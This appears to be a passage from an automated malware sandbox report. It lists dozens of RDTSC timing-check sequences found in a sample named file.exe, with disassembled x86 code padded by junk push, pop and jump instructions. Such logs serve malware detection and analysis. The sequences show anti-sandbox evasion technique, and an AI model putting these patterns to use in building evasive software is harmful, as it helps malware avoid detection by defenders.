[ebp+122D24D5h], ecx 0x0000007f jmp 00007FAAC5254A97h 0x00000084 add eax, dword ptr [esp+24h] 0x00000088 cmc 0x00000089 mov dword ptr [ebp+122D24D5h], esi 0x0000008f mov ebx, dword ptr [esp+24h] 0x00000093 jmp 00007FAAC5254A8Fh 0x00000098 nop 0x00000099 push eax 0x0000009a push eax 0x0000009b push edx 0x0000009c pushad 0x0000009d popad 0x0000009e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E460 second address: 95E473 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E473 second address: 95E48A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAC5254A92h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E48A second address: 95E49B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FAAC5092E56h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E53D second address: 95E547 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAAC5254A86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E547 second address: 95E568 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E568 second address: 95E56C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E56C second address: 95E570 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E570 second address: 95E596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 xchg eax, esi 0x00000008 push eax 0x00000009 jo 00007FAAC5254AA7h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FAAC5254A95h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E596 second address: 95E59A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E679 second address: 95E688 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E688 second address: 95E68D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E68D second address: 95E6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edi 0x0000000c push ebx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ebx 0x00000010 pop edi 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007FAAC5254A95h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c pushad 0x0000001d jmp 00007FAAC5254A94h 0x00000022 push edi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95ED97 second address: 95ED9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95ED9D second address: 95EDA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986FE3 second address: 98700C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 jmp 00007FAAC5092E5Eh 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jo 00007FAAC5092E62h 0x00000018 jl 00007FAAC5092E56h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98A7C4 second address: 98A7C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98A7C8 second address: 98A7E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAAC5092E64h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98A7E6 second address: 98A7FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A92h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98A7FC second address: 98A802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98A802 second address: 98A80C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FAAC5254A86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98EDC1 second address: 98EDC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98EF45 second address: 98EF49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98F2D9 second address: 98F2DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98E8EA second address: 98E8EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98E8EE second address: 98E8FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98E8FA second address: 98E8FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FA0F second address: 98FA2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FAAC5092E56h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FA2F second address: 98FA3F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAAC5254A86h 0x00000008 jo 00007FAAC5254A86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FD3C second address: 98FD4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jnp 00007FAAC5092E5Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FD4C second address: 98FD54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FD54 second address: 98FD63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5092E5Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FD63 second address: 98FD7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A98h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E0D4 second address: 91E0E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FAAC5092E56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E0E0 second address: 91E0FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FAAC5254A8Bh 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E0FA second address: 91E100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E100 second address: 91E104 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E104 second address: 91E11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FAAC5092E62h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9948F8 second address: 994909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 994909 second address: 99490D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99490D second address: 99493D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A93h 0x00000007 jmp 00007FAAC5254A95h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99493D second address: 994947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FAAC5092E56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 994947 second address: 99494D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99494D second address: 994960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jbe 00007FAAC5092E56h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 994960 second address: 994966 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 997ADA second address: 997AEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E5Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FAAC5092E56h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C0F5 second address: 99C0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C0FF second address: 99C103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C3F4 second address: 99C3FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FAAC5254A86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C546 second address: 99C54A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C54A second address: 99C564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FAAC5254A86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAC5254A8Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C564 second address: 99C56A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C81B second address: 99C81F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C81F second address: 99C828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C828 second address: 99C846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FAAC5254A86h 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAC5254A8Dh 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C846 second address: 99C84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CB3B second address: 99CB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jmp 00007FAAC5254A8Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CB54 second address: 99CB5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CB5A second address: 99CB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007FAAC5254A99h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CB7E second address: 99CB88 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAAC5092E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CB88 second address: 99CBA6 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAAC5254A8Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007FAAC5254A86h 0x00000010 jl 00007FAAC5254A86h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CBA6 second address: 99CBB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E5Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CF9D second address: 99D019 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007FAAC5254A8Ch 0x0000000e push esi 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007FAAC5254A96h 0x00000016 pop esi 0x00000017 pushad 0x00000018 jmp 00007FAAC5254A90h 0x0000001d jmp 00007FAAC5254A93h 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 push edi 0x0000002a pop edi 0x0000002b jc 00007FAAC5254A86h 0x00000031 jbe 00007FAAC5254A86h 0x00000037 popad 0x00000038 jmp 00007FAAC5254A94h 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D019 second address: 99D01F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D01F second address: 99D023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D164 second address: 99D168 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D168 second address: 99D188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5254A94h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D188 second address: 99D18C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A07EE second address: 9A07F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A9613 second address: 9A9617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A994B second address: 9A9962 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A93h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A9962 second address: 9A9988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007FAAC5092E64h 0x0000000c pop esi 0x0000000d jc 00007FAAC5092E5Eh 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A9988 second address: 9A9990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A9ABC second address: 9A9AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95EAA2 second address: 95EAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95EAA6 second address: 95EAB0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A9F04 second address: 9A9F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A9F08 second address: 9A9F17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007FAAC5092E56h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADD5F second address: 9ADD63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AD7C5 second address: 9AD7D5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAAC5092E56h 0x00000008 ja 00007FAAC5092E56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1C4D second address: 9B1C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1C52 second address: 9B1C6B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAAC5092E62h 0x00000008 push edi 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1065 second address: 9B1069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1069 second address: 9B1086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5092E67h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1301 second address: 9B1307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1307 second address: 9B130D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1461 second address: 9B1465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1465 second address: 9B1492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAAC5092E61h 0x0000000b pop edx 0x0000000c jc 00007FAAC5092E6Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 jmp 00007FAAC5092E5Bh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B16DE second address: 9B16E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B16E2 second address: 9B1701 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAAC5092E56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FAAC5092E63h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BA0E2 second address: 9BA0E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8234 second address: 9B824A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5092E62h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B824A second address: 9B8265 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A97h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8265 second address: 9B8275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 jnp 00007FAAC5092E56h 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8275 second address: 9B8296 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAAC5254A97h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8296 second address: 9B829A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B901D second address: 9B9027 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAAC5254A8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9027 second address: 9B902E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9830 second address: 9B9834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9834 second address: 9B983A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9DC2 second address: 9B9DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9DC8 second address: 9B9DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
